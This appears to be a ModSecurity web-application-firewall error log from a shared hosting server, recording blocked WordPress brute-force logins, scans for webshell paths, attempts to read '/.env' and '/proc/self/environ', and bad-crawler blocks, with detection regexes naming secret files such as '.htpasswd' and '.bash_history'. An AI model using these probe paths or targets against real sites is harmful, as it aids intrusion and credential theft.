[Tue May 26 19:17:47.088801 2026] [security2:error] [pid 26857:tid 26971] [remote 46.20.146.46:53622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkgtfoqtHEG_e9i6HLFAAAlXE"]
[Tue May 26 19:17:47.738001 2026] [security2:error] [pid 26857:tid 27062] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkg9foqtHEG_e9i6HLLQAAANA"]
[Tue May 26 19:17:48.740282 2026] [security2:error] [pid 26857:tid 26972] [remote 46.20.146.46:53622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkhNfoqtHEG_e9i6HLdAAAunI"], referer: https://shahvishaal.moes-art.com/wp-login.php
[Tue May 26 19:17:49.060294 2026] [security2:error] [pid 26857:tid 26981] [remote 82.196.25.136:56174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkhNfoqtHEG_e9i6HLfgAAu3s"]
[Tue May 26 19:17:50.257294 2026] [security2:error] [pid 26857:tid 27016] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkhdfoqtHEG_e9i6HLqAAAAKI"]
[Tue May 26 19:17:51.166716 2026] [security2:error] [pid 26857:tid 27020] [client 45.154.98.236:54155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWkh9foqtHEG_e9i6HL_AAAAKY"]
[Tue May 26 19:17:51.168349 2026] [security2:error] [pid 26857:tid 27081] [client 45.154.98.236:54113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWkh9foqtHEG_e9i6HL_QAAAOM"], referer: www.google.com
[Tue May 26 19:17:51.176872 2026] [security2:error] [pid 26857:tid 27024] [client 45.154.98.236:54049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWkh9foqtHEG_e9i6HMBAAAAKo"], referer: www.google.com
[Tue May 26 19:17:51.186512 2026] [autoindex:error] [pid 26857:tid 27008] [client 45.154.98.236:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:17:51.468698 2026] [security2:error] [pid 26857:tid 27012] [client 45.154.98.236:59068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/dblizfbp.php"] [unique_id "ahWkh9foqtHEG_e9i6HMGgAAAJ4"], referer: www.google.com
[Tue May 26 19:17:51.609884 2026] [security2:error] [pid 26857:tid 27043] [client 45.154.98.236:58288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWkh9foqtHEG_e9i6HMIAAAAL0"], referer: www.google.com
[Tue May 26 19:17:51.945708 2026] [security2:error] [pid 26857:tid 27091] [client 45.154.98.236:55098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWkh9foqtHEG_e9i6HMNAAAAO0"], referer: www.google.com
[Tue May 26 19:17:52.115281 2026] [security2:error] [pid 26857:tid 27004] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkh9foqtHEG_e9i6HMJQAAAJY"]
[Tue May 26 19:17:52.397080 2026] [security2:error] [pid 26857:tid 27035] [client 45.154.98.236:51930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/iblvrrzu.php"] [unique_id "ahWkiNfoqtHEG_e9i6HMUgAAALU"], referer: www.google.com
[Tue May 26 19:17:54.019391 2026] [security2:error] [pid 26857:tid 27081] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkidfoqtHEG_e9i6HMmwAAAOM"]
[Tue May 26 19:17:56.552251 2026] [security2:error] [pid 26857:tid 27025] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkjNfoqtHEG_e9i6HNLAAAAKs"]
[Tue May 26 19:17:56.677745 2026] [security2:error] [pid 26857:tid 26969] [remote 72.167.150.128:54666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkjNfoqtHEG_e9i6HNSQAAsG8"]
[Tue May 26 19:17:56.975887 2026] [security2:error] [pid 26857:tid 26866] [remote 72.167.150.128:54666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkjNfoqtHEG_e9i6HNZAAA0gg"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:17:57.905455 2026] [security2:error] [pid 26857:tid 27033] [client 205.185.127.250:59586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.127.185.205.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWkjdfoqtHEG_e9i6HNiQAAALM"]
[Tue May 26 19:17:58.411744 2026] [security2:error] [pid 26857:tid 26872] [remote 162.240.12.204:47126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 204.12.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWkjtfoqtHEG_e9i6HNswABBA4"]
[Tue May 26 19:17:58.441746 2026] [security2:error] [pid 26857:tid 27064] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkjtfoqtHEG_e9i6HNpQAAANI"]
[Tue May 26 19:17:58.757018 2026] [security2:error] [pid 26857:tid 26876] [remote 188.245.120.91:35116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.120.245.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWkjtfoqtHEG_e9i6HNxwAAvRI"]
[Tue May 26 19:17:59.636726 2026] [security2:error] [pid 26857:tid 27105] [client 87.236.176.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWkj9foqtHEG_e9i6HN9wAA-xM"]
[Tue May 26 19:17:59.676405 2026] [security2:error] [pid 26857:tid 26987] [client 185.247.137.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWkj9foqtHEG_e9i6HN-QAAhRk"]
[Tue May 26 19:17:59.900971 2026] [security2:error] [pid 26857:tid 27025] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkj9foqtHEG_e9i6HN_AAAAKs"]
[Tue May 26 19:18:00.022595 2026] [security2:error] [pid 26857:tid 26878] [remote 188.245.120.91:35116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.120.245.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWkkNfoqtHEG_e9i6HOGgAAzhQ"], referer: https://dimensioncorporativa.com.co/wp-login.php
[Tue May 26 19:18:00.418154 2026] [security2:error] [pid 26857:tid 26896] [remote 216.73.216.30:6424] ModSecurity: Access denied with connection close (phase 1). Pattern match "proc/self/environ" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1161"] [id "999997"] [msg "proc environ"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWkkNfoqtHEG_e9i6HOLQAAqSY"]
[Tue May 26 19:18:02.448555 2026] [security2:error] [pid 26857:tid 27050] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkkdfoqtHEG_e9i6HOjwAAAMQ"]
[Tue May 26 19:18:02.601003 2026] [security2:error] [pid 26857:tid 27042] [client 114.119.140.239:63067] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/regalia/athelstan-memberofficer-PastMasterCollarJewel.jpg"] [unique_id "ahWkktfoqtHEG_e9i6HOsAAAALw"], referer: https://athelstan.org.in/athelstan-regalia.php
[Tue May 26 19:18:02.853992 2026] [security2:error] [pid 26857:tid 27010] [client 113.166.245.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkktfoqtHEG_e9i6HOqAAAAJw"]
[Tue May 26 19:18:03.791811 2026] [security2:error] [pid 26857:tid 27083] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkk9foqtHEG_e9i6HO3wAAAOU"]
[Tue May 26 19:18:04.410994 2026] [security2:error] [pid 26857:tid 26953] [remote 54.39.186.191:36828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.186.39.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWklNfoqtHEG_e9i6HPFgAA3l8"]
[Tue May 26 19:18:05.658904 2026] [security2:error] [pid 26857:tid 26959] [remote 54.39.186.191:36828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.186.39.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWkldfoqtHEG_e9i6HPZgAAl2U"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:18:05.836973 2026] [security2:error] [pid 26857:tid 27004] [client 39.61.3.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWkldfoqtHEG_e9i6HPeAAAAJY"]
[Tue May 26 19:18:05.847643 2026] [security2:error] [pid 26857:tid 27001] [client 39.61.3.207:41220] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWkldfoqtHEG_e9i6HPYgAAAJM"]
[Tue May 26 19:18:06.990219 2026] [security2:error] [pid 26857:tid 27060] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkltfoqtHEG_e9i6HPrQAAAM4"]
[Tue May 26 19:18:08.525575 2026] [security2:error] [pid 26857:tid 27088] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkmNfoqtHEG_e9i6HQEQAAAOo"]
[Tue May 26 19:18:10.551984 2026] [security2:error] [pid 26857:tid 27086] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkmtfoqtHEG_e9i6HQiQAAAOg"]
[Tue May 26 19:18:12.722673 2026] [security2:error] [pid 26857:tid 26920] [remote 94.76.235.103:59632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWknNfoqtHEG_e9i6HQ_wAAwj4"]
[Tue May 26 19:18:13.739969 2026] [security2:error] [pid 26857:tid 27046] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkndfoqtHEG_e9i6HRJQAAAMA"]
[Tue May 26 19:18:14.130133 2026] [security2:error] [pid 26857:tid 27018] [client 176.65.139.235:53050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.jiyani.in"] [uri "/.env"] [unique_id "ahWkntfoqtHEG_e9i6HRTQAAAKQ"]
[Tue May 26 19:18:14.271598 2026] [security2:error] [pid 26857:tid 26945] [remote 94.76.235.103:59632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkntfoqtHEG_e9i6HRUAAAo1c"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:18:15.001979 2026] [security2:error] [pid 26857:tid 26962] [remote 74.7.241.58:53840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWkn9foqtHEG_e9i6HRfQAAk2g"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/wp-staging/Framework/DI
[Tue May 26 19:18:15.645244 2026] [security2:error] [pid 26857:tid 27010] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkn9foqtHEG_e9i6HRjAAAAJw"]
[Tue May 26 19:18:17.709917 2026] [security2:error] [pid 26857:tid 27002] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkodfoqtHEG_e9i6HSAwAAAJQ"]
[Tue May 26 19:18:18.720051 2026] [security2:error] [pid 26857:tid 26874] [remote 141.95.202.18:34454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWkotfoqtHEG_e9i6HSVAAAuRA"]
[Tue May 26 19:18:19.197908 2026] [security2:error] [pid 26857:tid 27025] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkotfoqtHEG_e9i6HSYQAAAKs"]
[Tue May 26 19:18:19.959103 2026] [security2:error] [pid 26857:tid 26883] [remote 162.240.12.204:53160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 204.12.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWko9foqtHEG_e9i6HSjwAAoxk"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:18:21.800483 2026] [security2:error] [pid 26857:tid 27077] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkpdfoqtHEG_e9i6HS4QAAAN8"]
[Tue May 26 19:18:22.120822 2026] [security2:error] [pid 26857:tid 26924] [remote 154.66.198.148:16574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkpdfoqtHEG_e9i6HS_wAA3kI"]
[Tue May 26 19:18:23.589047 2026] [security2:error] [pid 26857:tid 26935] [remote 154.66.198.148:16574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkp9foqtHEG_e9i6HTVgAAvU0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:18:23.696115 2026] [security2:error] [pid 26857:tid 27105] [client 114.119.154.124:46241] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/velusce-suscipit-quis-luctus"] [unique_id "ahWkp9foqtHEG_e9i6HTYAAAAPs"], referer: https://koneksi.com.co/velusce-suscipit-quis-luctus
[Tue May 26 19:18:23.912155 2026] [security2:error] [pid 26857:tid 27114] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkp9foqtHEG_e9i6HTUwAAAQQ"]
[Tue May 26 19:18:25.072767 2026] [security2:error] [pid 26857:tid 26994] [client 14.244.151.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkqNfoqtHEG_e9i6HTjwAAAIw"]
[Tue May 26 19:18:25.896172 2026] [security2:error] [pid 26857:tid 27071] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkqdfoqtHEG_e9i6HTuAAAANk"]
[Tue May 26 19:18:27.198730 2026] [security2:error] [pid 26857:tid 27031] [client 114.119.130.91:40317] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "shirdisaibabatemple.org"] [uri "/saibaba-festivals-gurupoornima.php"] [unique_id "ahWkq9foqtHEG_e9i6HT_wAAALE"], referer: https://shirdisaibabatemple.org/
[Tue May 26 19:18:27.376158 2026] [security2:error] [pid 26857:tid 27110] [client 51.89.129.24:29944] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bosscoirs.com"] [uri "/robots.txt"] [unique_id "ahWkq9foqtHEG_e9i6HUCwAAAQA"]
[Tue May 26 19:18:27.376266 2026] [security2:error] [pid 26857:tid 27110] [client 51.89.129.24:29944] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bosscoirs.com"] [uri "/robots.txt"] [unique_id "ahWkq9foqtHEG_e9i6HUCwAAAQA"]
[Tue May 26 19:18:27.595691 2026] [security2:error] [pid 26857:tid 27068] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkq9foqtHEG_e9i6HT-gAAANY"]
[Tue May 26 19:18:27.760406 2026] [security2:error] [pid 26857:tid 27009] [client 68.183.88.172:33022] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "dimensioncorporativa.com.co"] [uri "/"] [unique_id "ahWkq9foqtHEG_e9i6HUIAAAAJs"]
